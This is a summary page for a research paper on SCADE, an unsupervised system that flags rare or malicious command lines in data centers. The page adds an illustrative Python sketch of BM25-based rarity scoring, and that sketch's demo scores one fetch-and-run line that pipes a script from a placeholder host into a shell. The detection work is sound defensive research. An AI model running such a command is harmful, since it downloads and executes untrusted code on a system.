SCADE: Scalable Framework for Anomaly Detection in High-Performance System

Vaishali Vinay, Anjali Mangal

TL;DR

The paper tackles the challenge of detecting anomalous command-line activity in high-computation data-center environments where labeled attack data are scarce. It introduces SCADE, a scalable, unsupervised framework with a dual-layer architecture: a global layer scores how rare a command is across the whole environment (using BM25 and Log Entropy), and a local layer compares it against context-specific usage baselines. Key contributions include 1-gram and 2-gram tokenization of command lines, dynamic thresholding to keep the signal-to-noise ratio (SNR) high, metadata-driven detection, and a four-stage data pipeline that enables near real-time monitoring in large-scale deployments. The proof-of-concept results show high detection precision with few false positives, and the framework has been deployed in Azure data centers, which points to its potential for scalable command-line security in enterprise environments.

Abstract

As command-line interfaces remain integral to high-performance computing environments, the risk of exploitation through stealthy and complex command-line abuse grows. Conventional security solutions struggle to detect these anomalies due to their context-specific nature, lack of labeled data, and the prevalence of sophisticated attacks like Living-off-the-Land (LOL). To address this gap, we introduce the Scalable Command-Line Anomaly Detection Engine (SCADE), a framework that combines global statistical models with local context-specific analysis for unsupervised anomaly detection. SCADE leverages novel statistical methods, including BM25 and Log Entropy, alongside dynamic thresholding to adaptively detect rare, malicious command-line patterns in low signal-to-noise ratio (SNR) environments. Experimental results show that SCADE achieves above 98% SNR in identifying anomalous behavior while minimizing false positives. Designed for scalability and precision, SCADE provides an innovative, metadata-enriched approach to anomaly detection, offering a robust solution for cybersecurity in high-computation environments. This work presents SCADE's architecture, detection methodology, and its potential for enhancing anomaly detection in enterprise systems. We argue that SCADE represents a significant advancement in unsupervised anomaly detection, offering a robust, adaptive framework for security analysts and researchers seeking to enhance detection accuracy in high-computation environments.
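
The global rarity scoring described above can be illustrated with a minimal sketch. It is not the authors' implementation: it assumes whitespace tokenization, uses only the inverse-document-frequency term of BM25 (the term-frequency and length-normalization parts are omitted), and stands in a simple quantile cutoff for the paper's dynamic thresholding. All function names (`ngrams`, `bm25_idf`, `rarity_score`, `dynamic_threshold`) are hypothetical.

```python
import math
from collections import Counter


def ngrams(command, n_values=(1, 2)):
    """Split a command line on whitespace and return its 1-grams and 2-grams."""
    tokens = command.split()
    grams = []
    for n in n_values:
        grams.extend(" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1))
    return grams


def bm25_idf(corpus):
    """Compute the BM25 IDF weight of every n-gram seen in a corpus of commands.

    Assumption: only the IDF component of BM25 is used as the rarity signal.
    """
    n_docs = len(corpus)
    doc_freq = Counter()
    for command in corpus:
        doc_freq.update(set(ngrams(command)))  # count each n-gram once per command
    idf = {
        gram: math.log((n_docs - df + 0.5) / (df + 0.5) + 1.0)
        for gram, df in doc_freq.items()
    }
    return idf, n_docs


def rarity_score(command, idf, n_docs):
    """Average IDF of the command's n-grams; unseen n-grams get the maximum weight."""
    unseen_weight = math.log((n_docs + 0.5) / 0.5 + 1.0)
    grams = ngrams(command)
    if not grams:
        return 0.0
    return sum(idf.get(gram, unseen_weight) for gram in grams) / len(grams)


def dynamic_threshold(scores, quantile=0.99):
    """Assumed stand-in for dynamic thresholding: the score at a given quantile."""
    ordered = sorted(scores)
    index = min(len(ordered) - 1, int(quantile * len(ordered)))
    return ordered[index]


if __name__ == "__main__":
    history = ["ls -la /home"] * 50 + ["git status"] * 50
    idf, n_docs = bm25_idf(history)
    cutoff = dynamic_threshold([rarity_score(c, idf, n_docs) for c in history])
    for candidate in ["git status", "curl http://example.invalid/x.sh | sh"]:
        score = rarity_score(candidate, idf, n_docs)
        print(candidate, round(score, 3), "ANOMALOUS" if score > cutoff else "ok")
```

In this sketch the cutoff is recomputed from whatever score distribution is observed, so it adapts as the command history changes; a command built entirely from unseen n-grams scores well above a routine one.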

Paper Structure

This paper contains 20 sections, 1 figure, 1 table.

Figures (1)

  • Figure 1: The architecture of the SCADE framework. It highlights the dual-layer analysis approach combining Global and Local Analysis, designed to detect anomalies in command-line activities with precision and contextual awareness.